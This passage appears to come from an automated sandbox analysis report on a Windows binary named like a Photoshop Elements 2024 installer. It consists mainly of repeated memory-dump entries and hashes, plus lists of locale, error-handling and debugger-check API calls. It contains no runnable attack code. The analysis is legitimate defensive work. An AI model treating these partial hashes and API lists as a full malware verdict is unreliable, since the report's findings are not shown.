                                                                                                        • Source File: 0000000A.00000002.3775358970.000000000C470000.00000010.00000800.00020000.00000000.sdmp, Offset: 0C470000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_c470000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 43e9e456df4894401c15b478709a7668ca80bf393c9555a5f4939e34f563db62
                                                                                                        • Instruction ID: e5e3e4bbb8fe065a85d2e0d64d5bfdc80809524daf260fb3ea16344e04886990
                                                                                                        • Opcode Fuzzy Hash: 43e9e456df4894401c15b478709a7668ca80bf393c9555a5f4939e34f563db62
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3775358970.000000000C470000.00000010.00000800.00020000.00000000.sdmp, Offset: 0C470000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_c470000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 43e9e456df4894401c15b478709a7668ca80bf393c9555a5f4939e34f563db62
                                                                                                        • Instruction ID: e5e3e4bbb8fe065a85d2e0d64d5bfdc80809524daf260fb3ea16344e04886990
                                                                                                        • Opcode Fuzzy Hash: 43e9e456df4894401c15b478709a7668ca80bf393c9555a5f4939e34f563db62
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3775358970.000000000C470000.00000010.00000800.00020000.00000000.sdmp, Offset: 0C470000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_c470000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 43e9e456df4894401c15b478709a7668ca80bf393c9555a5f4939e34f563db62
                                                                                                        • Instruction ID: e5e3e4bbb8fe065a85d2e0d64d5bfdc80809524daf260fb3ea16344e04886990
                                                                                                        • Opcode Fuzzy Hash: 43e9e456df4894401c15b478709a7668ca80bf393c9555a5f4939e34f563db62
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3775358970.000000000C470000.00000010.00000800.00020000.00000000.sdmp, Offset: 0C470000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_c470000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 43e9e456df4894401c15b478709a7668ca80bf393c9555a5f4939e34f563db62
                                                                                                        • Instruction ID: e5e3e4bbb8fe065a85d2e0d64d5bfdc80809524daf260fb3ea16344e04886990
                                                                                                        • Opcode Fuzzy Hash: 43e9e456df4894401c15b478709a7668ca80bf393c9555a5f4939e34f563db62
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3775358970.000000000C470000.00000010.00000800.00020000.00000000.sdmp, Offset: 0C470000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_c470000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 43e9e456df4894401c15b478709a7668ca80bf393c9555a5f4939e34f563db62
                                                                                                        • Instruction ID: e5e3e4bbb8fe065a85d2e0d64d5bfdc80809524daf260fb3ea16344e04886990
                                                                                                        • Opcode Fuzzy Hash: 43e9e456df4894401c15b478709a7668ca80bf393c9555a5f4939e34f563db62
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3775358970.000000000C470000.00000010.00000800.00020000.00000000.sdmp, Offset: 0C470000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_c470000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 43e9e456df4894401c15b478709a7668ca80bf393c9555a5f4939e34f563db62
                                                                                                        • Instruction ID: e5e3e4bbb8fe065a85d2e0d64d5bfdc80809524daf260fb3ea16344e04886990
                                                                                                        • Opcode Fuzzy Hash: 43e9e456df4894401c15b478709a7668ca80bf393c9555a5f4939e34f563db62
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3775358970.000000000C470000.00000010.00000800.00020000.00000000.sdmp, Offset: 0C470000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_c470000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 43e9e456df4894401c15b478709a7668ca80bf393c9555a5f4939e34f563db62
                                                                                                        • Instruction ID: e5e3e4bbb8fe065a85d2e0d64d5bfdc80809524daf260fb3ea16344e04886990
                                                                                                        • Opcode Fuzzy Hash: 43e9e456df4894401c15b478709a7668ca80bf393c9555a5f4939e34f563db62
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3775358970.000000000C470000.00000010.00000800.00020000.00000000.sdmp, Offset: 0C470000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_c470000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 43e9e456df4894401c15b478709a7668ca80bf393c9555a5f4939e34f563db62
                                                                                                        • Instruction ID: e5e3e4bbb8fe065a85d2e0d64d5bfdc80809524daf260fb3ea16344e04886990
                                                                                                        • Opcode Fuzzy Hash: 43e9e456df4894401c15b478709a7668ca80bf393c9555a5f4939e34f563db62
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3775358970.000000000C470000.00000010.00000800.00020000.00000000.sdmp, Offset: 0C470000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_c470000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 43e9e456df4894401c15b478709a7668ca80bf393c9555a5f4939e34f563db62
                                                                                                        • Instruction ID: e5e3e4bbb8fe065a85d2e0d64d5bfdc80809524daf260fb3ea16344e04886990
                                                                                                        • Opcode Fuzzy Hash: 43e9e456df4894401c15b478709a7668ca80bf393c9555a5f4939e34f563db62
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3775358970.000000000C470000.00000010.00000800.00020000.00000000.sdmp, Offset: 0C470000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_c470000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 43e9e456df4894401c15b478709a7668ca80bf393c9555a5f4939e34f563db62
                                                                                                        • Instruction ID: e5e3e4bbb8fe065a85d2e0d64d5bfdc80809524daf260fb3ea16344e04886990
                                                                                                        • Opcode Fuzzy Hash: 43e9e456df4894401c15b478709a7668ca80bf393c9555a5f4939e34f563db62
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3775358970.000000000C470000.00000010.00000800.00020000.00000000.sdmp, Offset: 0C470000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_c470000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 43e9e456df4894401c15b478709a7668ca80bf393c9555a5f4939e34f563db62
                                                                                                        • Instruction ID: e5e3e4bbb8fe065a85d2e0d64d5bfdc80809524daf260fb3ea16344e04886990
                                                                                                        • Opcode Fuzzy Hash: 43e9e456df4894401c15b478709a7668ca80bf393c9555a5f4939e34f563db62
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3775358970.000000000C470000.00000010.00000800.00020000.00000000.sdmp, Offset: 0C470000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_c470000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 43e9e456df4894401c15b478709a7668ca80bf393c9555a5f4939e34f563db62
                                                                                                        • Instruction ID: e5e3e4bbb8fe065a85d2e0d64d5bfdc80809524daf260fb3ea16344e04886990
                                                                                                        • Opcode Fuzzy Hash: 43e9e456df4894401c15b478709a7668ca80bf393c9555a5f4939e34f563db62
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3776538684.000000000CCD0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0CCD0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_ccd0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                                        • Instruction ID: 5e1f32685384975b23c1edbfb8397a69696b7dfdb3c321501e549e0b3c0ecb69
                                                                                                        • Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3776538684.000000000CCD0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0CCD0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_ccd0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                                        • Instruction ID: 5e1f32685384975b23c1edbfb8397a69696b7dfdb3c321501e549e0b3c0ecb69
                                                                                                        • Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3776538684.000000000CCD0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0CCD0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_ccd0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                                        • Instruction ID: 5e1f32685384975b23c1edbfb8397a69696b7dfdb3c321501e549e0b3c0ecb69
                                                                                                        • Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3776538684.000000000CCD0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0CCD0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_ccd0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                                        • Instruction ID: 5e1f32685384975b23c1edbfb8397a69696b7dfdb3c321501e549e0b3c0ecb69
                                                                                                        • Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3776538684.000000000CCD0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0CCD0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_ccd0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                                        • Instruction ID: 5e1f32685384975b23c1edbfb8397a69696b7dfdb3c321501e549e0b3c0ecb69
                                                                                                        • Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        APIs
                                                                                                          • Part of subcall function 00536413: GetLastError.KERNEL32(00000002,00000000,00000006,0051DC92,00000000,00000000,00000002,?,0053C9D9,00000000,00000000,?,00000000,00000002), ref: 00536418
                                                                                                          • Part of subcall function 00536413: SetLastError.KERNEL32(00000000,00000002,000000FF,?,0053C9D9,00000000,00000000,?,00000000,00000002), ref: 005364B6
                                                                                                          • Part of subcall function 00536413: _free.LIBCMT ref: 00536475
                                                                                                          • Part of subcall function 00536413: _free.LIBCMT ref: 005364AB
                                                                                                        • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 00541B86
                                                                                                        • IsValidCodePage.KERNEL32(00000000), ref: 00541BCF
                                                                                                        • IsValidLocale.KERNEL32(?,00000001), ref: 00541BDE
                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00541C26
                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 00541C45
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                                                                                        • String ID: Z
                                                                                                        • API String ID: 949163717-2636666949
                                                                                                        • Opcode ID: 4566c036ec3ffb3220a12c0ab1d520cd2060a7582ca9da34fd68f02b1fb22a0d
                                                                                                        • Instruction ID: bacd3ae219cc7f7579e9e45b53d0e649965c960feffa912548e85dea709fcd71
                                                                                                        • Opcode Fuzzy Hash: 4566c036ec3ffb3220a12c0ab1d520cd2060a7582ca9da34fd68f02b1fb22a0d
                                                                                                        • Instruction Fuzzy Hash: 8351B071A00A06ABEF10DFA5CC85AFE7BB8FF59704F044469F915E7180EB709985CB64
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __floor_pentium4
                                                                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                        • API String ID: 4168288129-2761157908
                                                                                                        • Opcode ID: 88e345475a6ceb2ab8734ed28d4e9fe223cecebeb192cfea76d5a43df2ccdbb5
                                                                                                        • Instruction ID: 58613ed175a2463915463a1dcb661bff9ad4b8090eeb0d4b8801c9cd726fa39f
                                                                                                        • Opcode Fuzzy Hash: 88e345475a6ceb2ab8734ed28d4e9fe223cecebeb192cfea76d5a43df2ccdbb5
                                                                                                        • Instruction Fuzzy Hash: C2D23A71E092298FDB64CE28DD447EABBB5FB84308F5445EAE40DE7240E774AE858F41
                                                                                                        APIs
                                                                                                          • Part of subcall function 00536413: GetLastError.KERNEL32(00000002,00000000,00000006,0051DC92,00000000,00000000,00000002,?,0053C9D9,00000000,00000000,?,00000000,00000002), ref: 00536418
                                                                                                          • Part of subcall function 00536413: SetLastError.KERNEL32(00000000,00000002,000000FF,?,0053C9D9,00000000,00000000,?,00000000,00000002), ref: 005364B6
                                                                                                        • GetACP.KERNEL32(?,?,?,?,?,?,00534D70,?,?,?,?,?,-00000050,?,?,?), ref: 005411DA
                                                                                                        • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00534D70,?,?,?,?,?,-00000050,?,?), ref: 00541205
                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 00541368
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$CodeInfoLocalePageValid
                                                                                                        • String ID: Z$utf8
                                                                                                        • API String ID: 607553120-2328135999
                                                                                                        • Opcode ID: 7aabc17b4acaebf77ec7afb36ab22e8ee47476be9ad6bc7d2bbf88b1df376990
                                                                                                        • Instruction ID: ac288dd9426742b71226e0f4a0257d59dbe175c4c57b1a07d150f3d2f8aebd18
                                                                                                        • Opcode Fuzzy Hash: 7aabc17b4acaebf77ec7afb36ab22e8ee47476be9ad6bc7d2bbf88b1df376990
                                                                                                        • Instruction Fuzzy Hash: 7371FA31A00B06ABDB25AF75CC4ABEB7FA8FF85748F144429F605D7581EA70E980C758
                                                                                                        APIs
                                                                                                        • GetLocaleInfoW.KERNEL32(51CEB70F,2000000B,00000000,00000002,00000000,?,?,?,00541BC3,?,00000000), ref: 0054193E
                                                                                                        • GetLocaleInfoW.KERNEL32(51CEB70F,20001004,00000000,00000002,00000000,?,?,?,00541BC3,?,00000000), ref: 00541967
                                                                                                        • GetACP.KERNEL32(?,?,00541BC3,?,00000000), ref: 0054197C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InfoLocale
                                                                                                        • String ID: ACP$OCP
                                                                                                        • API String ID: 2299586839-711371036
                                                                                                        • Opcode ID: e5f7c252d2dd98720b065b3329fec7e5a057aa55a9370c9041f745afcdf4f4e8
                                                                                                        • Instruction ID: 998d234890ecd118056ae69aa51bf0e59df0965fd1a21ce58dd4049fc1705853
                                                                                                        • Opcode Fuzzy Hash: e5f7c252d2dd98720b065b3329fec7e5a057aa55a9370c9041f745afcdf4f4e8
                                                                                                        • Instruction Fuzzy Hash: 3D21C532600901EADB388F54D911BE7BFA6BF55B58B568824E90ADB105F732DEC1C358
                                                                                                        APIs
                                                                                                        • Concurrency::cancel_current_task.LIBCPMT ref: 0028815B
                                                                                                          • Part of subcall function 00241410: std::_Lockit::_Lockit.LIBCPMT ref: 0024144F
                                                                                                          • Part of subcall function 00241410: std::_Lockit::_Lockit.LIBCPMT ref: 00241471
                                                                                                          • Part of subcall function 00241410: std::_Lockit::~_Lockit.LIBCPMT ref: 00241491
                                                                                                          • Part of subcall function 00241410: std::_Lockit::~_Lockit.LIBCPMT ref: 00241636
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                                                                                                        • String ID: 0123456789-+Ee
                                                                                                        • API String ID: 3053331623-1347306980
                                                                                                        • Opcode ID: bcfa4bbf90a14cd053cb75238909369fe218f90af898a82fdabb54a469703c3d
                                                                                                        • Instruction ID: a262649e9e3e1325582eeccccf79be375a621ec364cd7cf37debe13e252db62d
                                                                                                        • Opcode Fuzzy Hash: bcfa4bbf90a14cd053cb75238909369fe218f90af898a82fdabb54a469703c3d
                                                                                                        • Instruction Fuzzy Hash: ABC2D038612246CFDB24DF68C440BA9BBF1BF56304FA88599D4959B3D2DB31EC56CB10
                                                                                                        APIs
                                                                                                          • Part of subcall function 00536413: GetLastError.KERNEL32(00000002,00000000,00000006,0051DC92,00000000,00000000,00000002,?,0053C9D9,00000000,00000000,?,00000000,00000002), ref: 00536418
                                                                                                          • Part of subcall function 00536413: SetLastError.KERNEL32(00000000,00000002,000000FF,?,0053C9D9,00000000,00000000,?,00000000,00000002), ref: 005364B6
                                                                                                          • Part of subcall function 00536413: _free.LIBCMT ref: 00536475
                                                                                                          • Part of subcall function 00536413: _free.LIBCMT ref: 005364AB
                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00541580
                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 005415CA
                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00541690
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InfoLocale$ErrorLast_free
                                                                                                        • String ID:
                                                                                                        • API String ID: 3140898709-0
                                                                                                        • Opcode ID: 6fec1e9cad5197f67b50d1bd20cb95f80ccdf6e26c617c6d26eab2f54664e7de
                                                                                                        • Instruction ID: ddd13a931e206e809d43cad52cf3eff255a1bb0100a3fddef03bf3648d6ccf78
                                                                                                        • Opcode Fuzzy Hash: 6fec1e9cad5197f67b50d1bd20cb95f80ccdf6e26c617c6d26eab2f54664e7de
                                                                                                        • Instruction Fuzzy Hash: 1C61BF71900A079FEB289F28CD82BEA7BA8FF44308F148179E905C6985E774D9C5CB58
                                                                                                        APIs
                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00521524
                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0052152E
